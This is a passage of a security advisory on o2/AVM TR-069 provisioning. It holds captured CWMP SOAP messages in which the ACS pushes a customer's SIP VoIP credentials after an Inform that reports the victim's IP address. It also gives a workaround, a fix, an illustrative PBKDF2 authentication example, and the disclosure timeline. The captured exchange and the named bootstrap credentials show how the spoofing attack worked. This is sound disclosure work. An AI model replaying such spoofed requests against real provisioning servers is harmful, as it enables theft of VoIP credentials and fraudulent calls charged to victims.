InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string">39315846</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg13] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg14] CPE -> ACS B:
---------------------
[empty]
[msg15] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[3]">
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.PeriodicInformEnable
</Name>
<Value xsi:type="xsd:boolean">1</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.
PeriodicInformInterval
</Name>
<Value xsi:type="xsd:unsignedInt">38888</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.PeriodicInformTime
</Name>
<Value xsi:type="xsd:dateTime">
2014-09-08T10:49:21+1:00
</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315849</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg16] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg17] CPE <- ACS B:
---------------------
[empty]
[msg18] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:Inform>
<DeviceId>
<Manufacturer>AVM</Manufacturer>
<OUI>00040E</OUI>
<ProductClass>FRITZ!Box</ProductClass>
<SerialNumber>0896D776FAA2</SerialNumber>
</DeviceId>
<Event soap-enc:arrayType="cwmp:EventStruct[1]">
<EventStruct>
<EventCode>6 CONNECTION REQUEST</EventCode>
<CommandKey/>
</EventStruct>
</Event>
<MaxEnvelopes>1</MaxEnvelopes>
<CurrentTime>2014-09-08T18:27:36+02:00</CurrentTime>
<RetryCount>0</RetryCount>
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceSummary</Name>
<Value xsi:type="xsd:string">
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,
VolumeConfig:1)
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>
<Value xsi:type="xsd:string">113.06.20</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>
<Value xsi:type="xsd:string">1.0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string"/>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ParameterKey
</Name>
<Value xsi:type="xsd:string">39315849</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.ManagementServer.ConnectionRequestURL
</Name>
<Value xsi:type="xsd:string">
http://78.48.x.x:8089/869f7018
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.
WANIPConnection.1.ExternalIPAddress
</Name>
<Value xsi:type="xsd:string">78.48.x.x</Value>
</ParameterValueStruct>
</ParameterList>
</cwmp:Inform>
</soap:Body>
</soap:Envelope>
[msg19] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:InformResponse>
<MaxEnvelopes>1</MaxEnvelopes>
</cwmp:InformResponse>
</soapenv:Body>
</soapenv:Envelope>
[msg20] CPE -> ACS B:
---------------------
[empty]
[msg21] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158500</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[2]">
<ParameterValueStruct>
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>
<Value xsi:type="xsd:string">
20140908xxxxxx-0896D776FAA2-78.48.x.x
</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.Capabilities.
X_AVM-DE_UsePSTN
</Name>
<Value xsi:type="xsd:boolean">0</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315850</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg22] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158500</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg23] CPE <- ACS B:
---------------------
<?xml version="1.0"?>
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Header>
<cwmp:ID soapenv:mustUnderstand="1">393158501</cwmp:ID>
</soapenv:Header>
<soapenv:Body>
<cwmp:SetParameterValues>
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[13]">
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Enable
</Name>
<Value xsi:type="xsd:string">Enabled</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.Enable
</Name>
<Value xsi:type="xsd:string">Enabled</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.X_AVM-DE_UseAuthUsername
</Name>
<Value xsi:type="xsd:boolean">0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.X_AVM-DE_CLIRType
</Name>
<Value xsi:type="xsd:int">5</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.PSTNFailOver
</Name>
<Value xsi:type="xsd:boolean">0</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.DTMFMethod
</Name>
<Value xsi:type="xsd:string">RFC2833</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.OutboundProxy
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.UserAgentDomain
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.RegistrarServer
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.SIP.ProxyServer
</Name>
<Value xsi:type="xsd:string">sip.alice-voip.de</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthPassword
</Name>
<Value xsi:type="xsd:string">0241463xxxxxxxxx</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.DirectoryNumber
</Name>
<Value xsi:type="xsd:string">463xxxxx</Value>
</ParameterValueStruct>
<ParameterValueStruct>
<Name>
InternetGatewayDevice.Services.VoiceService.1.VoiceProfile.
1.Line.1.SIP.AuthUserName
</Name>
<Value xsi:type="xsd:string">49241463xxxxx</Value>
</ParameterValueStruct>
</ParameterList>
<ParameterKey>39315850</ParameterKey>
</cwmp:SetParameterValues>
</soapenv:Body>
</soapenv:Envelope>
[msg24] CPE -> ACS B:
---------------------
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">
<soap:Header>
<cwmp:ID soap:mustUnderstand="1">393158501</cwmp:ID>
</soap:Header>
<soap:Body>
<cwmp:SetParameterValuesResponse>
<Status>0</Status>
</cwmp:SetParameterValuesResponse>
</soap:Body>
</soap:Envelope>
[msg25] CPE <- ACS B:
---------------------
[empty]
------------------------------------------------------------------------
Workaround
==========
o2 implemented countermeasures that prevent attackers from spoofing a
victim's IP address in CWMP messages. This prevents attackers from
retrieving arbitrary o2 customers' VoIP credentials, but it addresses
the spoofing only, not the underlying lack of CPE authentication (see
Fix).
Fix
===
The CPE needs to be properly authenticated when communicating with the
ACS. One way of doing so would be to have the CPE supply the password of
the DSL connection. This password is already known to the CPE, as the
customer entered it manually during the initial setup process.
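One way to implement the fix described above, as an added example that is
not o2's or AVM's code: the ACS keeps a salted PBKDF2 verifier of a
per-subscriber secret (standing in for the DSL access password),
authenticates the CPE with a constant-time comparison, and derives the
VoIP lines to push from the authenticated subscriber record. The
self-reported ExternalIPAddress is accepted as a parameter and
deliberately never consulted, and the provider-wide bootstrap credentials
from tr069.cfg map to no subscriber at all. The subscriber records, the
secrets and the PBKDF2 parameters are assumptions of this example; how the
CPE would transport the DSL password (HTTP authentication on the TLS
connection, as for ManagementServer.Password today) is not specified by
the advisory.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional

KDF_ITERATIONS = 100_000  # assumption for the example; tune to the ACS hardware


def make_verifier(secret: str, salt: Optional[bytes] = None) -> Dict[str, bytes]:
    """Store a salted PBKDF2 digest of the subscriber secret, never the secret itself."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, KDF_ITERATIONS)
    return {"salt": salt, "digest": digest}


# Constructed subscriber records. The key plays the role of
# ManagementServer.Username (in [msg09] the CPE serial number); the secret
# is the customer's DSL access password as suggested above. The VoIP lines
# hang off the subscriber record, not off an IP address.
SUBSCRIBERS = {
    "0896D776FAA2": {
        "verifier": make_verifier("constructed-dsl-password"),
        "lines": [{"DirectoryNumber": "5550100",
                   "SIP.AuthUserName": "49555510000",
                   "SIP.AuthPassword": "constructed-sip-secret"}],
    },
}

# The provider-wide bootstrap credentials from tr069.cfg identify a firmware
# profile, not a customer, so no subscriber record exists for them.
BOOTSTRAP_USERNAME, BOOTSTRAP_PASSWORD = "00040E-000000000000", "o2acs"

_DUMMY = make_verifier("unused")  # keeps timing uniform for unknown usernames


def authenticate(username: str, password: str) -> bool:
    """Verify the CPE's credentials against the stored verifier in constant time."""
    record = SUBSCRIBERS.get(username)
    verifier = record["verifier"] if record else _DUMMY
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    verifier["salt"], KDF_ITERATIONS)
    return record is not None and hmac.compare_digest(candidate, verifier["digest"])


def provision_voip(username: str, password: str,
                   reported_external_ip: str) -> Optional[List[Dict[str, str]]]:
    """Return the lines to push in a SetParameterValues, or None if not authenticated.

    reported_external_ip is WANIPConnection.1.ExternalIPAddress from the Inform.
    It is accepted only to make the point: identity comes from the verified
    per-subscriber secret, never from a value the CPE reports about itself.
    """
    _ = reported_external_ip  # never consulted
    if not authenticate(username, password):
        return None
    return SUBSCRIBERS[username]["lines"]


if __name__ == "__main__":
    print(provision_voip("0896D776FAA2", "constructed-dsl-password", "198.51.100.7"))
    print(provision_voip(BOOTSTRAP_USERNAME, BOOTSTRAP_PASSWORD, "198.51.100.7"))
```

With this lookup, a spoofed ExternalIPAddress buys the attacker nothing,
and the shared bootstrap credentials cannot retrieve any customer's lines.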
Security Risk
=============
This vulnerability allows the unauthorised use of other customers' VoIP
telephone numbers. The victim is charged for all costs resulting from
fraudulent phone calls. Furthermore, an attacker may answer phone calls
on behalf of the victim. Customers have no means of defending themselves
against such an attack. Chances are that the attack will be noticed only
by customers who regularly check their invoices. The vulnerability is
therefore considered to pose a high risk.
Timeline
========
2014-09-08 - Potential vulnerability discovered
2014-09-20 - Vulnerability verified
2014-10-17 - ISP was notified about the vulnerability
2014-10-17 - ISP implemented first countermeasures
2014-10-24 - ISP wants to investigate further
2014-11-28 - ISP needs more time, depends on hardware manufacturer
2015-01-23 - ISP is still investigating, wants to permanently solve the
problem
2015-03-31 - ISP is still working on the problem, asks for more time
2015-06-12 - ISP wants to notify the proper German authorities about the
problem first while working on a solution
2015-06-18 - ISP notified German authorities (Bundesnetzagentur, BfDI,
BSI)
2016-01-08 - Advisory released
References
==========
[0] https://www.iol.unh.edu/sites/default/files/knowledgebase/hnc/TR-069_Crash_Course.pdf
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen